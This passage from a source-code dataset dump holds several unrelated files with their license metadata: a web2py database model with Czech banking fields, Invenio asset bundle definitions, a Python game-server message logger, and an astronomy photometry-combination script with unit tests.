requires=[IS_NOT_EMPTY(), IS_DATETIME(format=TFu('%d.%m.%Y'))]),
Field('castka', 'decimal(11,2)'),
Field('popis', 'text'),
Field('cislo_uctu', length=30),
Field('kod_banky', length=10),
Field('nazev_banky', length=40),
Field('zakaznik', length=10),
Field('vs', length=10, default=''),
Field('ss', length=10, default=''),
Field('ks', length=4, default=''),
Field('id_pohybu', length=12),
Field('id_pokynu', length=12),
)
db.define_table('systab',
Field('kod', length=12),
Field('hodnota', length=100),
)
db.define_table('loginlog',
Field('idauth_user', 'reference auth_user'),
Field('datum', 'date'),
)
db.define_table('zadost',
Field('zadost', 'datetime', label="Datum žádosti"),
Field('idauth_user', 'reference auth_user', label="Uživatel"),
Field('vyridil_id', 'reference auth_user', label="Vyřídil"),
Field('vs', length=10, label="Symbol",
comment="symbol uživatele"),
Field('ss', length=10, label="Symbol obsol",
comment=""),
Field('typ', 'integer', label='Typ žádosti',
comment='1 sa->wKasa, 2->na BÚ, 3 členství, 4 refundace'),
Field('cislo_uctu', length=30, label='Číslo účtu'),
Field('kod_banky', length=10, label='Kód banky'),
Field('popis', 'text'),
Field('prevod', 'datetime', label='Datum vyřízení'),
Field('zadano', 'decimal(11,2)', label='Žádaná částka'),
Field('prevedeno', 'decimal(11,2)', label='Převedená částka'),
)
db.define_table('clenstvi',
Field('user_id', 'reference auth_user', label="Uživatel"),
Field('group_id', 'reference auth_group', label="Role ve sdružení"),
Field('ode_dne', 'date', label="Ode dne"),
Field('do_dne', 'date', label="Do dne"),
)
fix_login(db, auth, vs_default) # každému dát osobní symbol, logovat
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| agpl-3.0 | -6,709,750,360,438,365,000 | 33.940789 | 94 | 0.581549 | false |
MSusik/invenio | invenio/base/bundles.py | 1 | 2885 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Base bundles."""
from invenio.ext.assets import Bundle
invenio = Bundle(
"js/invenio.js",
output="invenio.js",
filters="requirejs",
weight=90
)
styles = Bundle(
"css/token-input.css",
"css/token-input-facebook.css",
"css/typeahead.js-bootstrap.css",
"less/base.less",
"css/tags/popover.css",
output="invenio.css",
depends=[
"less/base.less",
"less/base/**/*.less"
],
filters="less,cleancss",
)
# FIXME
#if config.CFG_WEBSTYLE_TEMPLATE_SKIN != "default":
# styles.contents.append("css/" + config.CFG_WEBSTYLE_TEMPLATE_SKIN + ".css")
jquery = Bundle(
"js/jquery.js",
"js/jquery.jeditable.mini.js",
"js/jquery.tokeninput.js",
"js/jquery-caret.js",
"js/typeahead.js",
"js/bootstrap.js",
"js/bootstrap-select.js",
"js/hogan.js",
"js/translate.js",
output="jquery.js",
filters="uglifyjs",
weight=10,
bower={
"jquery": "2.1.0",
"bootstrap": "3.2.0",
"hogan": "3.0.0",
"jquery.jeditable": "http://invenio-software.org/download/jquery/v1.5/js/jquery.jeditable.mini.js",
"jquery.tokeninput": "*"
}
)
# jQuery UI
jqueryui = Bundle(
"js/jqueryui/jquery-ui.custom.js",
"js/jquery-ui-timepicker-addon.js",
filters="uglifyjs",
output="jquery-ui.js",
weight=11,
bower={
"jqueryui": "1.11.0",
"jquery.ui.timepicker": "http://invenoi-software.org/download/jquery/jquery-ui-timepicker-addon-1.0.3.js"
}
)
# if ASSETS_DEBUG and not LESS_RUN_IN_DEBUG
lessjs = Bundle(
"js/less.js",
output="less.js",
filters="uglifyjs",
weight=0,
bower={
"less": "1.7.0"
}
)
# if ASSETS_DEBUG and not REQUIRESJS_RUN_IN_DEBUG
requirejs = Bundle(
"js/require.js",
"js/settings.js",
output="require.js",
filters="uglifyjs",
weight=0,
bower={
"requirejs": "latest"
}
)
# else
almondjs = Bundle(
"js/almond.js",
"js/settings.js",
output="almond.js",
filters="uglifyjs",
weight=0,
bower={
"almond": "latest"
}
)
| gpl-2.0 | 4,890,553,612,865,183,000 | 23.65812 | 113 | 0.625303 | false |
tsdfsetatata/xserver | Server/dump_srv/print_wanyaogu.py | 1 | 3005 | #!/usr/bin/python
# coding: UTF-8
import sys
from socket import *
import struct
import raid_pb2
import wanyaogu_pb2
import login_pb2
import cast_skill_pb2
import move_direct_pb2
import team_pb2
import datetime
import get_one_msg
import scene_transfer_pb2
import horse_pb2
WATCH_PLAYER = {8589935415}
HOST='127.0.0.1'
PORT=13697
PORT=get_one_msg.get_dumpsrv_port()
ADDR=(HOST, PORT)
client=socket(AF_INET, SOCK_STREAM)
client.connect(ADDR)
last_data = ""
player_list = {}
def get_buff_data(t1):
retdata = ""
for buffinfo in t1.buff_info:
tmp = "(%d) " % buffinfo.id
retdata = retdata + tmp
return retdata
while True:
ret, last_data, player_id, msg_id, pb_data = get_one_msg.get_one_msg(client, last_data)
if ret == -1:
break
if ret == 0:
continue
# data_len = data_len - 8 - 16
# msg_format = "=IHH" + str(data_len) + 'sQIHH'
# msg_len, msg_id, seq, pb_data, player_id, t1, t1, t1 = struct.unpack(msg_format, data)
# print "read msg:", msg_id
# if not player_id in WATCH_PLAYER:
# continue;
#场景切换 10112
if msg_id == 10112:
req = scene_transfer_pb2.scene_transfer_answer();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入场景[%s]" % (player_id, req.new_scene_id)
#副本完成 10812
if msg_id == 10812:
req = raid_pb2.raid_finish_notify();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 副本结算[%s]" % (player_id, req.star)
#万妖卡列表 11401
if msg_id == 11401:
req = wanyaogu_pb2.list_wanyaoka_answer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖卡列表[%s]" % (player_id, req.wanyaoka_id)
#万妖谷关卡开始通知 11402
if msg_id == 11402:
req = wanyaogu_pb2.wanyaogu_start_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷开始[%lu]" % (player_id, req.start_time)
#万妖谷关卡火炉挂机通知 11403
if msg_id == 11403:
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷火炉挂机" % (player_id)
#进入游戏对时
if msg_id == 10007:
req = login_pb2.EnterGameAnswer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入游戏 %u %d [%u %s %s]" % (player_id, req.curTime, req.direct, req.sceneId, req.posX, req.posZ)
#11404 //获得万妖卡通知 wanyaoka_get_notify
if msg_id == 11404:
req = wanyaogu_pb2.wanyaoka_get_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 获得万妖卡 %s" % (player_id, req.wanyaoka_id)
| gpl-3.0 | 5,305,513,111,979,851,000 | 27.45 | 140 | 0.603515 | false |
deapplegate/wtgpipeline | measure_skew_surface.py | 1 | 68615 | #!/usr/bin/env python
######################
from __future__ import with_statement
import unittest, sys, math, re, os, optparse
import numpy, astropy, astropy.io.fits as pyfits
from scipy import interpolate
import ldac, utilities
######################
__cvs_id__ = "$Id: measure_unstacked_photometry.py,v 1.15 2010-06-07 18:00:24 dapple Exp $"
##############################################################
# USAGE
##############################################################
usage = '''
measure_unstacked_photometry.py -o outfile [ -i instrum ] [ -m mastercat ] [-f] cat1 cat2 ...
Takes individual ldac catalogs and statistically combine flux measurements.
All other columns are copied from the mastercat.
Will recalculate flux errors based on proper Background Aperture RMS,
and will optionally rescale fluxs between images.
'''
###############################################################
# DEFAULTS & GLOBALS
###############################################################
__fluxscale_default__ = True
__bad_mag__ = -99
__bad_flux__ = -99
__resampling_sigma_scaling__ = 1.5
################################################################
# USER CALLABLE FUNCTIONS
################################################################
def loadImage(catfile):
'''loadImage
@param catfile string filename for ldac cat produced for an image
@returns Image object needed for measureUnstackedPhotometry'''
cat = ldac.openObjectFile(catfile)
gain = readGain(catfile)
apers = readApers(catfile)
catbase, ext = os.path.splitext(catfile)
photinfo = ldac.openObjectFile(catfile, 'PHOTINFO')
rms = photinfo['BACKGROUND_RMS']
return Image(cat, rms, apers, gain)
################################################################
def _isVector(flux):
return len(flux.shape) > 2
####
def _noFlagsMatch(flags, flagno):
return not (flags == flagno).any()
####
def measureUnstackedPhotometry(images,
fluxkey = 'FLUX_APER',
fluxscale = False):
'''measureUnstackedPhotometry
@param images A list of Image objects for each input catalog
@param fluxkey Key in each image catalog with flux measurement
@param fluxscale Rescale fluxes between images before combining
@returns chip id : (flux, fluxerr) dictionary for each chip type'''
fluxtype = utilities.extractFluxType(fluxkey)
fluxerr_key = 'FLUXERR_%s' % fluxtype
fluxs = _stackFluxs([ image.cat[fluxkey] for image in images ])
origErrs = _stackFluxs([ image.cat[fluxerr_key] for image in images ])
errs = _stackFluxs([ image.getFluxErr(fluxkey) for image in images ])
flag = _stackFluxs([image.cat['Flag'] for image in images])
MaxVal = _stackFluxs([image.cat['MaxVal'] for image in images])
BackGr = _stackFluxs([image.cat['BackGr'] for image in images])
peakvals = MaxVal + BackGr
imaflags = _stackFluxs([image.cat['IMAFLAGS_ISO'] for image in images])
combinedFluxs = {}
for chipId in [1,2,4,8]:
if _noFlagsMatch(imaflags, chipId):
continue
mask = cuts(fluxs, origErrs, peakvals, numpy.ones_like(fluxs))
mask = _setMask(mask, imaflags != chipId)
if fluxscale:
mags, magerrs = calcMags(fluxs, errs)
fluxscalingMask = createFluxScalingMask(fluxs, flag, mask)
fluxscalings = measureFluxScaling(mags, magerrs, fluxscalingMask)
fluxs = fluxscalings*fluxs
for i in xrange(len(images)):
if _isVector(fluxs):
errs[:,:,i] = images[i].getFluxErr(fluxkey, fluxscalings[:,i])
else:
errs[:,i] = images[i].getFluxErr(fluxkey, fluxscalings[i])
flux, err = statCombineFluxs(fluxs, errs, mask)
combinedFluxs[chipId] = (flux, err)
return combinedFluxs
######################################################################
def combineCats(images, instrum=None, mastercat=None, fluxscale = False):
'''combineCats Given input image objects, returns a catalog with statistically combined fluxs and magnitudes
@param images List of Image objects describing each input ldac catalog
@param instrum Instrument name to be included in each output flux column
@param mastercat Catalog containing other relevant data to be propagated to the output catalog
@param fluxscale Perform fluxscaling between images
@returns ldac.LDACCat A catalog where all flux measurements have been statistically combined
'''
if len(images) == 0:
return
if len(images) == 1:
return images[0].cat
referencecat = images[0].cat
fluxkeys, fluxerrkeys, magonlykeys, otherkeys = utilities.sortFluxKeys(referencecat.keys())
if mastercat is None:
mastercat = referencecat
else:
ignoreFluxkeys, ignoreFluxerrkeys, magonlykeys, otherkeys = utilities.sortFluxKeys(mastercat.keys())
cols = []
for key in otherkeys:
cols.append(mastercat.extractColumn(key))
for fluxkey in fluxkeys:
fluxType = utilities.extractFluxType(fluxkey)
fluxs = measureUnstackedPhotometry(images, fluxkey = fluxkey,
fluxscale = fluxscale)
for chipid, (flux, err) in fluxs.iteritems():
if instrum is None:
id = '%d' % chipid
else:
id = '%s-%d' % (instrum, chipid)
fluxerr_key = 'FLUXERR_%s' % fluxType
if len(flux.shape) == 1:
cols.append(pyfits.Column(name='%s-%s' % (fluxkey, id),
format='E',
array=flux))
cols.append(pyfits.Column(name='%s-%s' % (fluxerr_key, id),
format='E',
array=err))
else:
nelements = flux.shape[1]
cols.append(pyfits.Column(name='%s-%s' % (fluxkey, id),
format='%dE' % nelements,
array=flux))
cols.append(pyfits.Column(name='%s-%s' % (fluxerr_key, id),
format='%dE' % nelements,
array=err))
return ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols),
header=mastercat.hdu.header))
#################################################################
# MAIN
#################################################################
def _transferOtherHDUs(catfile):
hdulist = pyfits.open(catfile)
otherhdus = []
for hdu in hdulist:
try:
if hdu.header['EXTNAME'] != 'OBJECTS':
otherhdus.append(hdu)
except KeyError:
pass
return otherhdus
def main(args = sys.argv):
parser = optparse.OptionParser(usage = usage)
parser.add_option('-o', '--outfile',
help = 'output catalog name',
dest = 'outfile')
parser.add_option('-i', '--instrum',
help = 'Instrument tag',
dest = 'instrum')
parser.add_option('-m', '--mastercat',
help = 'Master catalog to pull non Flux columns from',
dest = 'mastercat')
parser.add_option('-f', '--nofluxscale',
help = 'Turn off fluxscaling between images',
dest = 'fluxscale',
action = 'store_false',
default = __fluxscale_default__)
options, catfiles = parser.parse_args()
if options.outfile is None:
parser.error('Must specify outfile')
mastercat = None
if options.mastercat:
mastercat = ldac.openObjectFile(options.mastercat)
images = [ loadImage(catfile) for catfile in catfiles ]
combinedcat = combineCats(images,
instrum = options.instrum,
mastercat = mastercat,
fluxscale = options.fluxscale)
hdus = [pyfits.PrimaryHDU(), combinedcat.hdu]
if mastercat:
hdus.extend(_transferOtherHDUs(options.mastercat))
else:
hdus.extend(_transferOtherHDUs(catfiles[0]))
hdulist = pyfits.HDUList(hdus)
hdulist.writeto(options.outfile, overwrite=True)
############################################################
# INTERNAL CLASSES
############################################################
class UnknownFluxTypeException(Exception): pass
class Image(object):
def __init__(self, cat, rms, apers, gain):
self.cat = cat
self.rms = rms
self.apers = apers
self.gain = gain
if 'ISOAREA_DETECT' in cat:
self.area = self.cat['ISOAREA_DETECT']
else:
self.area = self.cat['NPIX']
def getFluxErr(self, fluxkey = 'FLUX_APER', fluxscale = 1.):
if fluxkey == 'FLUX_APER':
area = numpy.pi*(self.apers/2.)**2
elif fluxkey == 'FLUX_ISO':
area = self.area
else:
raise UnknownFluxTypeException(fluxkey)
return numpy.sqrt(area*(__resampling_sigma_scaling__*self.rms)**2 + fluxscale*numpy.abs(self.cat[fluxkey])/self.gain)
#######################
# UTILITY FUNCTIONS
#######################
def cuts(photflux, errs, peakvals, mask=None):
if mask is None:
mask = numpy.ones_like(photflux)
else:
mask = numpy.copy(mask)
mask = _setMask(mask, peakvals > 20000)
mask[numpy.isnan(photflux)] = 0
mask[errs == 0.] = 0
return mask
################################
def adjustFlux(fluxs, fluxerrs, gain, backgroundRMS, fluxscales):
newFlux = fluxs*fluxscales
newfluxerrs = numpy.sqrt(backgroundRMS + newFlux/gain)/newFlux
return newFlux, newfluxerrs
#######################
def createFluxScalingMask(photflux, flags, mask = None):
if mask is None:
mask = numpy.ones_like(photflux)
else:
mask = numpy.copy(mask)
mask = _setMask(mask, numpy.logical_or(flags == 1, flags == 3))
mask[photflux < 0] = 0
return mask
#######################
def _measureFluxScaling_scalar(mags, magerrs, mask):
mask = numpy.copy(mask)
mask[numpy.logical_not(numpy.isfinite(mags))] = 0
mask[mags == __bad_mag__ ] = 0
mask[mags == 99 ] = 0
mask[mags == -99 ] = 0
nObs = numpy.sum(mask, axis=-1)
nImages = mags.shape[-1]
nGals = mags.shape[0]
aveMags = numpy.zeros(nGals)
stderr = numpy.zeros(nGals)
for i in xrange(nGals):
vals = mags[i][mask[i] == 1]
if len(vals) > 2:
aveMags[i] = numpy.average(vals)
stderr[i] = numpy.std(vals)
aveMagsMatrix = numpy.column_stack(nImages*[aveMags])
deltaMag = mags - aveMagsMatrix
allOffsets = numpy.zeros(nImages)
for i in xrange(nImages):
goodMags = deltaMag[:,i][numpy.logical_and(nObs > 2, mask[:,i] == 1)]
weights = 1./stderr[numpy.logical_and(nObs > 2, mask[:,i] == 1)]**2
if len(goodMags) == 0:
return numpy.ones(nImages)
if numpy.logical_or(weights == 0, numpy.isinf(weights)).all():
weights = numpy.ones_like(weights)
allOffsets[i] = -numpy.average(goodMags, weights=weights)
return 10**(-.4*allOffsets)
########################################
def measureFluxScaling(mags, magerrs, mask):
if len(mags.shape) == 2:
return _measureFluxScaling_scalar(mags, magerrs, mask)
nApers = mags.shape[1]
nImages = mags.shape[2]
scalings = numpy.zeros((nApers, nImages))
for aper in xrange(nApers):
scalings[aper,:] = _measureFluxScaling_scalar(mags[:,aper,:],
magerrs[:,aper,:],
mask[:,aper,:])
return scalings
########################################
def _setMask(mask, condition):
if len(mask.shape) == 2:
mask[condition] = 0
else:
for i in xrange(mask.shape[1]):
submask = mask[:,i,:]
submask[condition] = 0
mask[:,i,:] = submask
return mask
#########################################
def statCombineFluxs(fluxs, errs, mask, sigmaReject = 5):
########
def identifyOutliers(fluxs, errs, meanFlux, meanErr, nsigma):
refflux = _stackFluxs(nImages*[meanFlux])
refsig = _stackFluxs(nImages*[meanErr])
refsig = numpy.sqrt(refsig**2 + errs**2)
pull = (fluxs - refflux)/refsig
outliers = numpy.zeros_like(fluxs)
outliers[abs(pull) > 5] = 1
return outliers
##########
outliers = numpy.zeros_like(mask)
nImages = fluxs.shape[-1]
for i in xrange(2):
local_mask = numpy.ones_like(mask)
local_mask[numpy.logical_or(mask == 0, outliers == 1)] = 0
flux, err = _weightedAverage(fluxs, errs, local_mask)
skew, std_emp = calcSkewandStd(fluxs, local_mask)
outliers = identifyOutliers(fluxs, errs, flux, err, sigmaReject)
nOutliers = outliers.sum(axis=-1)
allRejected = (nOutliers == nImages)
if allRejected.any():
rejectedFluxs = fluxs[allRejected]
rejectedErrs = errs[allRejected]
rejectedMeanErr = err[allRejected]
rejectedMask = mask[allRejected]
medianVals = _median(rejectedFluxs, rejectedMask)
rejectedOutliers = identifyOutliers(rejectedFluxs, rejectedErrs, medianVals, rejectedMeanErr, sigmaReject)
outliers[allRejected] = rejectedOutliers
return skew, err / std_emp
####################################
def _weightedAverage(fluxs, errs, mask):
nImages = fluxs.shape[-1]
nGals = fluxs.shape[0]
local_errs = numpy.copy(errs)
local_errs[mask == 0] = 1
weights = mask * (1./local_errs**2)
weightsum = weights.sum(axis=-1)
flux = (weights*fluxs).sum(axis=-1, dtype=numpy.float64)/weightsum
err = numpy.sqrt(1./weightsum)
err[numpy.isnan(flux)] = __bad_flux__
flux[numpy.isnan(flux)] = __bad_flux__
return flux, err
###################
def calcSkewandStd(fluxs, mask):
nobs = mask.sum(axis=-1)
unweightedMean = (fluxs*mask).sum(axis=-1) / nobs
unweightedMeanGrid = numpy.zeros_like(fluxs)
if len(fluxs.shape) == 2:
unweightedMeanGrid = (unweightedMeanGrid.T + unweightedMean).T
unweightedStd = numpy.zeros(fluxs.shape[0])
skew = numpy.zeros(fluxs.shape[0])
for i in range(fluxs.shape[0]):
unweightedStd[i] = numpy.sqrt(numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**2)/nobs[i])
skew[i] = (numpy.sqrt(nobs[i]*(nobs[i] - 1))/(nobs[i] - 2))*(1./nobs[i])*numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**3)/(unweightedStd[i]**3)
else:
for i in range(fluxs.shape[2]):
unweightedMeanGrid[:,:,i] = unweightedMean
unweightedStd = numpy.zeros(fluxs.shape[:2])
skew = numpy.zeros(fluxs.shape[:2])
for i in range(fluxs.shape[0]):
unweightedStd[i,:] = numpy.sqrt(numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**2)/nobs[i])
skew[i,:] = (numpy.sqrt(nobs[i]*(nobs[i] - 1))/(nobs[i] - 2))*(1./nobs[i])*numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**3)/(unweightedStd[i]**3)
std = unweightedStd / numpy.sqrt(nobs)
std[nobs == 0] = -1
skew[nobs < 3] = numpy.nan
return skew, std
####################################
def _median(fluxs, mask):
##############
def scalarMedian(fluxs, mask):
nGals = len(fluxs)
flux = numpy.zeros(nGals)
for i in xrange(nGals):
flux[i] = numpy.median(fluxs[i][mask[i] == 1])
return flux
###############
fluxIsVector = fluxs.ndim == 3
if fluxIsVector:
nGals = fluxs.shape[0]
nApers = fluxs.shape[1]
flux = numpy.zeros((nGals, nApers))
for aper in xrange(nApers):
flux[:,aper] = scalarMedian(fluxs[:,aper,:], mask[:,aper,:])
return flux
else:
return scalarMedian(fluxs, mask)
####################################
def _stackFluxs(fluxs):
nfluxs = len(fluxs)
fluxshape = fluxs[0].shape
naxis = len(fluxshape)
resultshape = []
for i in xrange(naxis):
resultshape.append(fluxshape[i])
resultshape.append(nfluxs)
result = numpy.zeros(tuple(resultshape))
selector = [slice(fluxshape[i]) for i in xrange(naxis)]
selector.append(0)
for i in xrange(nfluxs):
selector[-1] = i
result[selector] = fluxs[i]
return result
########################################
def calcMags(fluxs, errs):
mags = -2.5*numpy.log10(fluxs)
magerrs = 1.0857 * errs / fluxs
magerrs[ numpy.logical_not(numpy.isfinite(mags)) ] = 0
mags[ numpy.logical_not(numpy.isfinite(mags)) ] = __bad_mag__
magerrs[mags > 99] = 99
magerrs[magerrs > 99] = 99
mags[mags > 99 ] = 99
return mags, magerrs
######################################
_commentFilter = re.compile('^#')
def readBackgroundRMS(file):
with open(file) as rmsFile:
for line in rmsFile.readlines():
if _commentFilter.match(line):
continue
try:
rms = float(line)
return rms
except:
continue
return rms
###################################
def readGain(cat):
fields = ldac.openObjectFile(cat, 'FIELDS')
return fields['GAIN']
###################################
_aperFilter = re.compile('^SEXAPED')
def readApers(cat):
fields = ldac.openObjectFile(cat, 'FIELDS')
apers = []
for key in sorted(fields.keys()):
if _aperFilter.match(key):
aper_diameter = fields[key][0]
if aper_diameter > 0:
apers.append(aper_diameter)
return numpy.array(apers)
#################################################
# TESTING
#################################################
class TestComponents(unittest.TestCase):
def testReadApers(self):
catFile = 'test_measureUnstackedPhot_readapers.cat'
def cleanUp():
if os.path.exists(catFile):
os.remove(catFile)
try:
if not os.path.exists(catFile):
cols = [pyfits.Column(name = 'SEXAPED1',
format = 'E',
array = numpy.array([10])),
pyfits.Column(name = 'SEXAPED2',
format = 'E',
array = numpy.array([15])),
pyfits.Column(name = 'SEXAPED3',
format = 'E',
array = numpy.array([0])),
pyfits.Column(name = 'SEXAPED4',
format = 'E',
array = numpy.array([0]))]
hdu = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu.header['EXTNAME']= 'FIELDS'
hdu.writeto(catFile, overwrite = True)
apers = readApers(catFile)
self.assertTrue((apers == numpy.array([10,15])).all())
finally:
cleanUp()
########################### #
def testReadBackgroundRMS(self):
rmsFile = 'test_measureUnstackedPhot_readBkgRMS.txt'
def cleanUp():
if os.path.exists(rmsFile):
os.remove(rmsFile)
try:
if not os.path.exists(rmsFile):
with open(rmsFile, 'w') as output:
output.write('#Aperture\tSigma\n')
output.write('.15\n')
RMS = readBackgroundRMS(rmsFile)
self.assertEquals(RMS, .15 )
finally:
cleanUp()
###################
def testReadGain(self):
catFile = 'test_measureUnstackedPhot_readgain.cat'
def cleanUp():
if os.path.exists(catFile):
os.remove(catFile)
try:
if not os.path.exists(catFile):
cols = [pyfits.Column(name = 'GAIN',
format = 'D',
array = numpy.array([900]))]
hdu = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu.header['EXTNAME']= 'FIELDS'
hdu.writeto(catFile, overwrite = True)
gain = readGain(catFile)
self.assertEqual(gain, 900)
finally:
cleanUp()
##################
def testSetMask_scalar(self):
mask = numpy.ones((10,6))
flag = numpy.array(10*[[0,0,0,0,0,1]])
newmask = _setMask(mask, flag > 0)
self.assertTrue((newmask == (1 - flag)).all())
#################
def testSetMask_vector(self):
mask = numpy.ones((10,5,6))
flag = numpy.array(10*[[0,0,0,0,0,1]])
expected = 1 - flag
newmask = _setMask(mask, flag > 0)
self.assertEquals(newmask.shape, (10,5,6))
for i in xrange(5):
self.assertTrue((newmask[:,i,:] == expected).all())
#################
def testCalcMags(self):
fluxs = 5*numpy.ones(30)
fluxerrs = .1*numpy.ones(30)
fluxs[0] = 1e-45
fluxs[1] = 1e-20
fluxs[25:] = -1
fluxs[-1] = 0
mags, magerrs, = calcMags(fluxs, fluxerrs)
self.assertTrue( (mags[0] == 99) )
self.assertTrue( (mags[2:25] == -2.5*numpy.log10(5) ).all() )
self.assertTrue( (mags[25:] == __bad_mag__).all() )
self.assertTrue( max(mags) <= 99 )
self.assertTrue( (magerrs[0] == 99) )
self.assertTrue( (magerrs[2:25] == (1.0857*.1/5)).all() )
self.assertTrue( (magerrs[25:] == 0).all() )
self.assertTrue( max(magerrs) <= 99 )
#################
class TestImage(unittest.TestCase):
def setUp(self):
self.catFile = 'test_measureUnstackedPhot_loadimage.cat0'
if not os.path.exists(self.catFile):
cols = [pyfits.Column(name = 'GAIN',
format = 'D',
array = numpy.array([900])),
pyfits.Column(name = 'SEXAPED1',
format = 'E',
array = numpy.array([10])),
pyfits.Column(name = 'SEXAPED2',
format = 'E',
array = numpy.array([15])),
pyfits.Column(name = 'SEXAPED3',
format = 'E',
array = numpy.array([0]))]
fields = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
fields.header['EXTNAME']= 'FIELDS'
cols = [pyfits.Column(name = 'Xpos',
format = 'E',
array = numpy.random.uniform(0,10000,200)),
pyfits.Column(name='FLUX_APER',
format = '2E',
array = numpy.ones((200,2))),
pyfits.Column(name='FLUX_ISO',
format = 'E',
array = numpy.ones(200)),
pyfits.Column(name='ISOAREA_DETECT',
format='E',
array = 10*numpy.ones(200))]
objects = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
objects.header['EXTNAME']= 'OBJECTS'
cols = [pyfits.Column(name='BACKGROUND_RMS', format='E', array = [0.15])]
photinfo = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
photinfo.header['EXTNAME']= 'PHOTINFO'
hdulist = pyfits.HDUList([pyfits.PrimaryHDU(), objects, fields, photinfo])
hdulist.writeto(self.catFile, overwrite = True)
def tearDown(self):
if os.path.exists(self.catFile):
os.remove(self.catFile)
def testLoadImage(self):
image = loadImage(self.catFile)
self.assertTrue(isinstance(image, Image))
self.assertTrue(isinstance(image.cat, ldac.LDACCat))
self.assertEqual(image.gain, 900)
self.assertEqual(image.rms, .15)
self.assertTrue((image.apers == numpy.array([10,15])).all())
###############
def testImageFluxErr_Aper(self):
image = loadImage(self.catFile)
errors = image.getFluxErr()
self.assertEquals(errors.shape, (200,2))
aper1Area = numpy.pi*(5**2)
aper2Area = numpy.pi*(7.5**2)
self.assertTrue((numpy.abs(errors[:,0] - numpy.sqrt(aper1Area*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
self.assertTrue((numpy.abs(errors[:,1] - numpy.sqrt(aper2Area*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
###############
def testImageFluxErr_Iso(self):
image = loadImage(self.catFile)
image.cat['ISOAREA_DETECT'][100:] = 100
errors = image.getFluxErr(fluxkey='FLUX_ISO')
self.assertEquals(errors.shape, (200,))
self.assertTrue((numpy.abs(errors[:100] - numpy.sqrt(10*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
self.assertTrue((numpy.abs(errors[100:] - numpy.sqrt(100*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
################
##################
class TestUnstackedPhotometry(unittest.TestCase):
def setUp(self):
self.nImages = 5
self.nObjs = 200
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones(self.nObjs)
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros_like(fluxs)
imaflags = numpy.ones_like(fluxs)
BackGr = numpy.zeros_like(fluxs)
MaxVal = 0.1*numpy.ones_like(fluxs)
NPIX = numpy.zeros(self.nObjs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format='E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, apers = numpy.ones(1), rms = 0., gain = 1.))
############
def testSimple(self):
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(len(flux), self.nObjs)
self.assertEqual(len(fluxerr), self.nObjs)
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
###########
def testFluxs(self):
expectedFluxs = 10**(-.4*numpy.random.uniform(-9,-2, self.nObjs))
for image in self.images:
catflux = image.cat['FLUX_APER']
image.cat['FLUX_APER'][:] = expectedFluxs + 0.05*numpy.random.standard_normal(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - expectedFluxs) < 1e-1).all() )
############
def testCuts(self):
self.images[-1].cat['MaxVal'][:] = 1e7*numpy.ones(self.nObjs)
self.images[-1].cat['FLUX_APER'][:] = 1e7*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testExcludeErr0(self):
self.images[-1].cat['FLUXERR_APER'][:] = numpy.zeros(self.nObjs)
